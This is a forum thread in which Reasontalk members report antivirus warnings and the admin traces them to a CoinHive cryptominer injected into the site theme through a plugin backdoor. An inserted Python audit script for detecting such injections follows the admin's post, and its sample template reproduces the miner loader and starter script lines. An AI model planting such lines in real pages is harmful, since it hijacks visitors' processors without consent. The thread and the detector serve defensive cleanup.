Sophos Detecting Malware

DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

28 Sep 2018

Hi,

Just wanted to mention that during the last week, whenever I go to the main Reasontalk page before going to the forum, my Sophos AntiVirus says it is blocking malware (see screenshot). Not sure what this is, or if it is a false positive, but just in case I thought I would bring this to your attention.

Kind Regards,

DinoJ
Attachment: Reasontalk AV.png (screenshot of it happening)

Zac
Posts: 1784
Joined: 19 May 2016

28 Oct 2018

I'm slightly surprised this hasn't been responded to... Sophos is legit and well established.

Surely this guy deserves a reply...?

WongoTheSane
Moderator
Posts: 1851
Joined: 14 Sep 2015
Location: Paris, France

29 Oct 2018

It should be resolved by now:

viewtopic.php?p=415966#p415966

...but if you still find anything suspicious, please report, it helps!

DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

02 Nov 2018

@Zac Thanks for the bump! Yeah, Sophos is the AV we use at my work and it is really good. I may have just jinxed myself by saying this, but we have had far fewer issues with viruses and malware in the last two years since we switched to it. Excluding the few users who insist on clicking links promising them tax refunds or opening attachments from people/organisations they don't know! But you can't blame Sophos for not being able to protect against PEBCAK/PICNIC :lol:

@WongoTheSane Thanks for the response and update, I can confirm Sophos no longer grumbles when I visit your site :)

DinoJ
Posts: 72
Joined: 22 Jan 2015
Location: UK

19 Nov 2018

Just to report, the malware detection on the Reasontalk main page has returned today; this time it is also triggering Malwarebytes as well as Sophos (see screenshot).

Attachment: Reasontalk Malware.png

rcbuse
RE Developer
Posts: 1175
Joined: 16 Jan 2015
Location: SR388

19 Nov 2018

Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com

Emian
Posts: 712
Joined: 16 Jan 2015

20 Nov 2018

rcbuse wrote:
19 Nov 2018
Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com
My virus scanner still blocks a coinhive site when coming here...


"I might be established, but I'll never be establishment"
- Dave Clarke - www.soundcloud.com/emian

Zac
Posts: 1784
Joined: 19 May 2016

20 Nov 2018

Should I worry about this? Is this an internal issue, i.e. put in place by the site owner, or some external hack?

Creativemind
Posts: 4875
Joined: 17 Jan 2015
Location: Stoke-On-Trent, England, UK

20 Nov 2018

Yeah my Avast anti-virus is too.
Attachment: Reasontalk Threat.PNG
Last edited by Creativemind on 20 Nov 2018, edited 2 times in total.
:reason:

Reason Studio's 11.3 / Cockos Reaper 6.82 / Cakewalk By Bandlab / Orion 8.6
http://soundcloud.com/creativemind75/iv ... soul-mix-3

Adabler
Competition Winner
Posts: 496
Joined: 05 Oct 2017
Location: Oslo

20 Nov 2018

Strange. I am using Firefox with tracking blocking, Avast and AdBlock, but I do not see any changes to CPU load when accessing reasontalk.com. I don't see exactly what AdBlock is blocking; could it be a dodgy ad causing this?
:reason: 12, Win10

avasopht
Competition Winner
Posts: 3932
Joined: 16 Jan 2015

20 Nov 2018

If you're not running regular (or even automatic) updates on forum and CMS you probably got hacked and had malware installed.

You might also want to double check the theme you've installed. Maybe that also opened a backdoor.

MikeMcKew
Moderator
Posts: 199
Joined: 16 Aug 2017
Location: Leesburg, VA

20 Nov 2018

Thank you everyone, for bringing this to our attention. If anyone else has reports, please continue to post them here. We are looking into this issue and hope to resolve it as quickly as possible.

nickb523
RE Developer
Posts: 427
Joined: 23 Jan 2017
Location: Fife, Scotland

20 Nov 2018

I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.

A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.

I can sort this out so if you need assistance just give me a shout. :)

Nick

Adabler
Competition Winner
Posts: 496
Joined: 05 Oct 2017
Location: Oslo

20 Nov 2018

nickb523 wrote:
20 Nov 2018
I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.
A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.
Do you know why something like this only seems to affect some users? What would be considered good practice on our end?
:reason: 12, Win10

Kenni
Site Admin
Posts: 1245
Joined: 02 Jun 2015
Location: Copenhagen, Denmark

21 Nov 2018

So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of JavaScript into the theme code, loading a CoinHive miner in the background, thus using visitors' CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Kenni Andruszkow
SoundCloud
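The injection Kenni describes (a single script line added to the theme, loading a miner from coinhive.com) is the kind of change a routine theme audit can catch before visitors' antivirus does. The following is an added example, not code from this thread, from Reasontalk or from its forum software: it parses template files, lists every script tag, and flags scripts loaded from hosts outside an allowlist or inline scripts that reference the CoinHive browser library. The allowlist of `reasontalk.com` hosts, the `CoinHive` global as an inline indicator, and the sample template are all assumptions constructed for the example.

```python
"""Audit theme/template files for injected <script> tags.

Added example (not the forum's own code). It flags:
  - external scripts loaded from a host outside ALLOWED_SCRIPT_HOSTS,
  - the coinhive.com host named in the thread specifically,
  - inline scripts referencing the CoinHive library's global object.
"""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"reasontalk.com", "www.reasontalk.com"}
# coinhive.com is the host reported in the thread; other remote hosts are "unlisted".
KNOWN_MINER_HOSTS = {"coinhive.com"}
# Assumed indicator: the CoinHive browser library exposed a global `CoinHive` object.
INLINE_INDICATOR = re.compile(r"\bCoinHive\b")


class ScriptCollector(HTMLParser):
    """Collects every <script> tag with its src attribute, inline body and line number."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of {"src", "body", "line"}
        self._current = None   # script currently being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "",
                             "line": self.getpos()[0]}

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as raw data, so this captures inline code.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_html(html):
    """Return findings (line, kind, detail) for script tags a clean theme should not contain."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for script in collector.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname  # None for relative paths like /assets/x.js
            if host is None or host in ALLOWED_SCRIPT_HOSTS:
                continue
            kind = "known-miner-host" if host in KNOWN_MINER_HOSTS else "unlisted-remote-host"
            findings.append({"line": script["line"], "kind": kind, "detail": script["src"]})
        elif INLINE_INDICATOR.search(script["body"]):
            findings.append({"line": script["line"], "kind": "inline-miner-indicator",
                             "detail": script["body"].strip()[:60]})
    return findings


def audit_theme_dir(root, extensions=(".html", ".htm", ".php", ".tpl")):
    """Walk a theme directory and map each file path to its findings (files with none are omitted)."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = audit_html(fh.read())
                if findings:
                    report[path] = findings
    return report


# Constructed sample template: two legitimate scripts, then an injected loader and starter.
SAMPLE_TEMPLATE = """<!DOCTYPE html>
<html><head>
<title>Reasontalk</title>
<script src="/assets/forum.js"></script>
<script src="https://www.reasontalk.com/assets/theme.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER').start();</script>
</head><body><p>Hello</p></body></html>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_TEMPLATE):
        print("line {line}: {kind}: {detail}".format(**finding))
```

Run `audit_theme_dir("/path/to/theme")` after each plugin or theme update and diff the output against the previous run; a new remote host or a new inline reference is exactly the one-line change the thread describes. Relative paths and the allowlisted hosts are skipped deliberately, so a first pass on a clean theme should return nothing.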

Zac
Posts: 1784
Joined: 19 May 2016

22 Nov 2018

Kenni wrote:
21 Nov 2018
So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of JavaScript into the theme code, loading a CoinHive miner in the background, thus using visitors' CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Thanks for the fix.
